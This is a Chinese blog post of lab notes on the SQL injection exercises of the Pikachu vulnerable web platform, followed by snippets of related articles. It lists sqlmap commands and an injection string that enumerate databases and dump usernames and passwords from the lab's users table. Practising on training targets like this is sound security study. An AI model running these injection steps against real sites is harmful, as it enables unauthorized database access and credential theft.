pikachu部分wp(本人的一些笔记)

最新推荐文章于 2024-04-06 21:53:04 发布
最新推荐文章于 2024-04-06 21:53:04 发布
阅读量3.7k 收藏
点赞数 3
文章标签: 网络协议 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53268118/article/details/124458693
版权

 

 

 

 

 

 

 

 

sql注入

数字型注入

任意提交数据,使用bp抓包得到post方式提交的参数为 id=1&submit=%E6%9F%A5%E8%AF%A2

 使用sqlmap跑post方式时的格式:python2 sqlmap.py -u "<url>" --data="<post提交的参数>" -<参数>

使用sqlmap跑数据库 

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql --dbs --batch

可以得到数据库名称

#--dbms 默认情况下会探测web应用后端的数据库是什么;该步骤--dbms mysql 制定了数据库类型为myslq数据库

#--dbs 当用户有权读取时,列出所有的数据库

#--batch 该参数使用后不需要用户输入,将会使用sqlmap给的默认提示走下去

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql -D pikachu --tables --batch

可以得到指定数据库下的表

# -D pikachu 指定数据库pikachu

#--tables 当有权限读取pikachu数据库中的表tables的时候,读取出表

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" -f --dbms mysql -D pikachu -T users --columns --batch

获取指定表下的列

#-T users 指定表名users

#--columns 当有权限读取表users中的列的时候读取表users中的列

获取列username和password中的字段内容

python2 sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" -f --dbms mysql -D pikachu -T users -C username,password --dump --batch

#-C username,password 指定读取列username和password中的字段内容

#--dump 抛出前面指定内容

字符型注入

输入1' or '1'# 用bp 抓包 可看到参数返回

爆出所有库

E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs

用pikachu数据库进行获取表和对应的列column

表:E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu --table -

batch

列:E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -t users

--column -batch

拿到username和password

E:\safe\sqlmap\sqlmap-1.2>python sqlmap.py -u "http://test.com/pikachu/vul/sqli/

sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users

-C username,password --dump

盲注(基于boolian)

在框中随便输入数据,抓包得到进行注入的url

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2  --current-db

得到pikachu数据库,然后

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2  -D pikachu --tables

继续

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2  -D pikachu -T users -columns获取users表

然后

python2 sqlmap.py -u "http://localhost/pikachu-master/pikachu-master/vul/sqli/sqli_blind_b.php?name=777777&submit=%E6%9F%A5%E8%AF%A2  -D pikachu -T users -C username,password --dump即获得用户名与密码

哈啾813
关注
pikachu靶场通关WP
cynthrial的博客
06-11 9775
pikachu靶场通关WP暴力破解基于表单的暴力破解验证码绕过(on server)验证码绕过(on client)token防爆破?Cross-Stie Scripting反射型xss(get)反射型xss(post)存储型xssDom型xssDom型xss-xXSS盲打XSS过滤XSS之htmlspecialcharsXSS之hrefXSS之JS输出CSRFCSRF(get)CSRF(POST)CSRF 防范增加token验证关于安全的会话管理(避免会话被利用)访问控制安全管理增加验证码SQL注入数
pikachu靶场之XSS学习笔记
Mbys_Lettuce的博客
10-01 489
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
WP学习笔记
amay1992的博客
05-06 417
Windows Phone 开发先决条件 有C#编程基础 使用Visual Studio开发,如果会Expression Blend更好 了解过Silverlight,但不是必要条件 移动开发主流手机系统 1 IPhone:IOS Objective-C 2 Google:Android Java 3 Microsoft:Windows Pho...
pikachu sql wp
m0_55185160的博客
06-20 157
SQL注入概述 SQL注入指的是通过将恶意SQL语句添加到应用的输入参数中,传递到后台被SQL服务器解析后执行的攻击。 基础知识 information_schema MYSQL更新到5.0后,默认在数据库中存放一个”information_schema“的数据库,记载了其他数据库的信息。 默认要记住三个表,SCHEMATA,TABLES,COLUMNS。 SCHEMATA:(记录了该用户创建的所有数据库名) ———————————————— 版权声明:本文为CSDN博主「kit_1」的原创文章,遵循C
wp使用笔记
zhangleifly——梦起飞的地方
05-08 2110
pikachu token防爆破? wp
mastergu2的博客
07-19 548
首先先看一下token验证的基本机制 1、当客户端第一次请求时,发送用户信息至服务器(用户名、密码),服务器对用户信息使用HS256算法及密钥进行签名,再将这个签名和数据一起作为Token一起返回给客户端 2、服务器不保存Token,客户端保存Token(比如放在 Cookie 里或者 Local Storage 里) 3、当客户端再次发送请求时,在请求信息中将Token一起发给服务器 4、服务器用同样的HS256算法和同样的密钥,对数据再进行一次签名,和客户端返回的Token的签名进行比较,如果验证成功
Pikachu靶场学习笔记.pdf
最新发布
09-24
Pikachu靶场学习笔记,包括环境搭建步骤、靶场安装过程、各类型漏洞原理讲解以及漏洞的复现利用过程,适合刚入门的网安新手/小白对Top10漏洞的学习与理解。
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu-master
05-04
Pikachu漏洞测试平台搭建详解》 在网络安全领域,漏洞测试是确保系统安全的重要环节。Pikachu,一个以小精灵命名的漏洞测试平台,因其易用性和实用性,成为了许多安全研究人员和初学者的首选工具。本文将详细介绍...
pikachu靶场之暴力破解学习笔记
Mbys_Lettuce的博客
11-07 249
暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。
pikachu漏洞平台靶场练习 总结 wp
Alexhirchi的博客
07-30 4677
每日学习 每日持续更新ing~ 之前一直都是在CTF刷题,感觉平常还是要打打靶场,学习一下实战环境啊~ 文章目录pikachu靶场Burt Force 暴力破解基于表单的暴力破解验证码绕过(on server)验证码绕过(on client)token防爆破?XSS(跨站脚本漏洞)CSRF(跨站请求伪造) pikachu靶场 Burt Force 暴力破解 关键点:连续性+自动化+字典 测试流程: (1)确认暴力破解的"可能性" (2)对字典的优化(根据注册要求去掉不必要的密码,验证存在的管理员账号直接.
Pikachu(皮卡丘)web漏洞练习平台记录(1)
SSDZLDL的博客
04-06 473
今天来练练皮卡丘平台的web漏洞,写点WP以防自己忘记细节,和督促自己做点事。
pikachu漏洞练习平台使用笔记-搭建环境
donghongzhe的博客
05-22 1万+
pikachu简介 pikachu是一个Web安全漏洞测试平台,本地搭建。 包含漏洞类型: 话不多说,开始搭建吧! 1、环境 这个系统是php写的,数据库是MySQL,所以,安装系统需要php+mysql+中间件的环境,我直接用的phpstudy集成环境。直接去phpstudy官网下载就行。 2、下载pikachu 下载连接 下载完成后放在网站根目录下。 3、配置pikachu 打开inc目录下config.inc.php文件 修改连接你mysql的用户名和密码 4、搭建
[Pikachu靶场实战系列] SQL注入
00勇士王子的博客
07-25 454
SQL注入概述 数字型注入(post) 随便选择一个进行抓包 可以看出,传入的值赋值给了参数id. 因为是数字型注入,我们在1后面加上一个单引号看是否报错 报错了,确定漏洞存在 id=1 or 1 # 可以把所有列表爆出来,因为1为真,符合所有条件,所以输出了所有的用户 order by 判断字段长度 order by 2 正常,order by 3 报错,说明字段长度为2 然后union select 进行联合查询,右边的1和2就是回显查询结果的地方 先查一下数据库,将结果回显到2的地
pikachu(皮卡丘)--SQL-Inject
m0_74871683的博客
10-17 175
与SQL注入相关知识点1.在MYSQL5.0版本后,系统会默认在数据库中存放一个schemata表用来存放用户创建的所有数据库的库名,需要记住数据库库名的字段名为tables存放数据所有数据库名和表名,记住这两个字段名和table_namecolumns存放所有的数据库名,表名和列名,需要记住这三个字段名table_name看到上面的说明应该明白输入等字段的原因了database():当前网站使用的数据库version():当前MYSQL的版本user(): 当前MYSQL用户或--空格或。
N2-Pikachu的暴力破解演示(表单)
尐猴子君ii的博客
03-25 4159
大家好,猴子君今天要为大家介绍的是通过burpsuite对pikachu测试平台进行暴力破解。 下面进入教学部分。 基于表单的暴力破解 首先打开burpsuite和xampp 点击Proxy,点击options,查看端口 打开浏览器,设置代理,在之前的burpsuite教程有讲。 输入pikachu的网址 打开burpsuite的Proxy,点击intercept的intercept点成of...
pikachu——简介
热门推荐
weixin_42095265的博客
12-12 2万+
这段时间打算本地搭建一个测试环境,偶然发现pikachu,一个比较详细的漏洞平台。这个平台使用php搭建的,需要php环境和mysql数据库支持。我本地用的是phpstudy,pikachu下载完了之后直接拷贝到phpstudy下的www目录下,然后安装就可以使用了。 pikachu:https://pan.baidu.com/s/14nfTgINiM2mzNbeeWakT8A ...
Pikachu实验过程重现(Burp suit的具体介绍)
gl620321的博客
03-24 1870
暴力破解漏洞的解析 一.暴力破解漏洞的原理 1.连续性尝试+字典+自动化 字典(自己要在网上查找资源并且在学习过程中收集属于自己的字典)字典可以提高暴力破解的效率 (1).常用的账号密码(弱口令),比如常用用户名和密码,在网上收集 (2).互联网被脱裤后账号密码 二.暴力破解漏洞的测试流程 三.基于表单的暴力破解(基于burp suite) 四.暴力破解安全验证码分析 五.暴力破解常见的防范措施@...
pikachu漏洞靶机之暴力破解漏洞
weixin_43803070的博客
06-01 1598
暴力破解漏洞: 前言: 破解流程: 我们首先抓包,随便入如一个账号、密码,发送到破解板块。 sniper破解方式只会一个一个去破解你需要破解的变量,比如需要破解一个password和uesrname,他只会单独破解pa或者单独破解us。 Battering ram选项,他能够把我们所选的所有变量,同时进行破解。(具有一致性),把所有变量进行全部替换。 Pitchfork这个选项,他会对我们所选择...
pikachu注入漏洞演示3
weixin_44722125的博客
04-04 1111
sql-inject 漏洞-盲注 盲注: 基于真假的盲注 先用字符串测试一下 发现不行 再试试 因为kobe存在,and 1=1为真 所以被写入后台,所以存在sql注入 用之前基于报错的payload来试一下 kobe’ and extractvalue(0,concat(0x7e,version()))# 不行 ...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值